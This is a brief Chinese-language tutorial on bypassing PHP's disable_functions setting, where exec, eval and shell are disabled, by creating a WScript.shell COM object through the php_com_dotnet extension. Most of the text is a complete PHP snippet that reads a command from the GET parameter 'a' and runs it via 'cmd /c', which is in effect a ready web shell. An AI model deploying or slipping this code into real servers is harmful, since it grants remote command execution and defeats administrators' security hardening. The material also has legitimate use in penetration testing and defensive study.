本文章主要讲述在php执行disable_function的函数绕过方式总结
Feature
调用COM对象执行命令
前提条件
调用COM对象需要开启扩展
extension=php_com_dotnet.dll
需要开启此扩展
绕过disable_function禁用的函数
disable_function禁用了exec
、eval
、shell
这三个函数
若需要执行系统命令,调用exec
函数肯定执行不了
可以发现执行系统命令是执行不了的
调用COM对象执行命令
<?php
$cmd = $_GET['a'];
$wsh = new COM('WScript.shell'); // 生成一个COM对象
$exec = $wsh->exec("cmd /c ".$cmd);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
通过调用COM对象即可执行系统命令